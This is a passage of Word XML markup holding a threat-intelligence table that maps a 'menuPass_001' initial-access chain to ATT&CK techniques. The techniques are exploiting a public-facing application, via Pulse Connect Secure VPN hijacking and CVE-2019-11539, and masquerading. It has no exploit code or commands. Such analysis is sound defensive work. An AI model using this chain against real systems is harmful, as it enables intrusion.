              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>201</w:t>
            </w:r>
            <w:r w:rsidR="0065494E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="038BAD39" w14:textId="753E9B8E" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="0065494E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:r w:rsidR="0065494E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14CD72F3" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="00AC7A85" w:rsidRDefault="006152F1" w:rsidP="006152F1"/>
    <w:p w14:paraId="28BFA025" w14:textId="77777777" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="006152F1">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10456" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="440"/>
        <w:gridCol w:w="1260"/>
        <w:gridCol w:w="2400"/>
        <w:gridCol w:w="635"/>
        <w:gridCol w:w="591"/>
        <w:gridCol w:w="563"/>
        <w:gridCol w:w="1034"/>
        <w:gridCol w:w="3533"/>
      </w:tblGrid>
      <w:tr w:rsidR="004D33D1" w:rsidRPr="002D1D50" w14:paraId="00CC12BE" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5A6F6EB0" w14:textId="77777777" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7FF643D1" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2594A469" w14:textId="5DC8B5B2" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="00BE6400" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>menuPass</w:t>
            </w:r>
            <w:r w:rsidR="006152F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="527410CF" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="49B5A5AC" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="58A19478" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="49C9A964" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="58744D73" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D33D1" w:rsidRPr="002D1D50" w14:paraId="325B1DBE" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FF7ADF5" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BD96CEA" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F343B56" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41D5512C" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F97D370" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E9729FB" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38326829" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00D2CEFB" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D33D1" w:rsidRPr="002D1D50" w14:paraId="042E2058" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C90E274" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D4C7F15" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AB3F8F5" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7562AEE9" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65DD0DAA" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C6217AF" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A33881E" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75F99DF8" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="002D1D50" w:rsidRDefault="006152F1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019215C" w:rsidRPr="00B857D7" w14:paraId="595B6E3A" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4562F259" w14:textId="175DD40E" w:rsidR="0019215C" w:rsidRDefault="0019215C" w:rsidP="0019215C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FF8111A" w14:textId="059CC926" w:rsidR="0019215C" w:rsidRPr="00B857D7" w:rsidRDefault="0019215C" w:rsidP="0019215C">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00" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AB50B4D" w14:textId="2A777855" w:rsidR="0019215C" w:rsidRPr="00B857D7" w:rsidRDefault="0019215C" w:rsidP="0019215C">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1190</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Exploit Public-Facing Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E7F88BA" w14:textId="4A23AAC3" w:rsidR="0019215C" w:rsidRDefault="0019215C" w:rsidP="0019215C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DAD15CC" w14:textId="77777777" w:rsidR="0019215C" w:rsidRPr="00B857D7" w:rsidRDefault="0019215C" w:rsidP="0019215C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3429FEDD" w14:textId="555ACA7D" w:rsidR="0019215C" w:rsidRDefault="0019215C" w:rsidP="0019215C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A233043" w14:textId="4CDAED4B" w:rsidR="0019215C" w:rsidRDefault="0019215C" w:rsidP="0019215C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-</w:t>
            </w:r>
            <w:r w:rsidR="00B7719C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>EXP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27C69F09" w14:textId="77777777" w:rsidR="0019215C" w:rsidRDefault="0019215C" w:rsidP="0019215C">
            <w:r w:rsidRPr="008D6D8A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="008D6D8A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0019215C">
              <w:t>The actor leveraged vulnerabilities in Pulse Connect Secure in order to hijack VPN sessions, or took advantage of system credentials that were stolen in previous operations.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42FF5B39" w14:textId="5C928785" w:rsidR="00A62D27" w:rsidRPr="008D6D8A" w:rsidRDefault="00A62D27" w:rsidP="0019215C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Assume </w:t>
            </w:r>
            <w:r w:rsidRPr="00A62D27">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CVE-2019-11539</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> to allow </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A62D27">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Ecipekac</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B7719C" w:rsidRPr="00B857D7" w14:paraId="2C15F873" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D8466B9" w14:textId="25F08417" w:rsidR="00B7719C" w:rsidRDefault="00175409" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B659820" w14:textId="3884B4FD" w:rsidR="00B7719C" w:rsidRPr="00B857D7" w:rsidRDefault="006621ED"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038A0A6D" w14:textId="6272ED64" w:rsidR="00B7719C" w:rsidRPr="00B857D7" w:rsidRDefault="006621ED" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006621ED">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1036.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006621ED">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Masquerading&gt;:Match Legitimate Name or Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61BEA261" w14:textId="56202A4C" w:rsidR="00B7719C" w:rsidRDefault="006621ED" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69685893" w14:textId="77777777" w:rsidR="00B7719C" w:rsidRPr="00B857D7" w:rsidRDefault="00B7719C" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="631AEA79" w14:textId="0E2137F1" w:rsidR="00B7719C" w:rsidRDefault="00175409" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
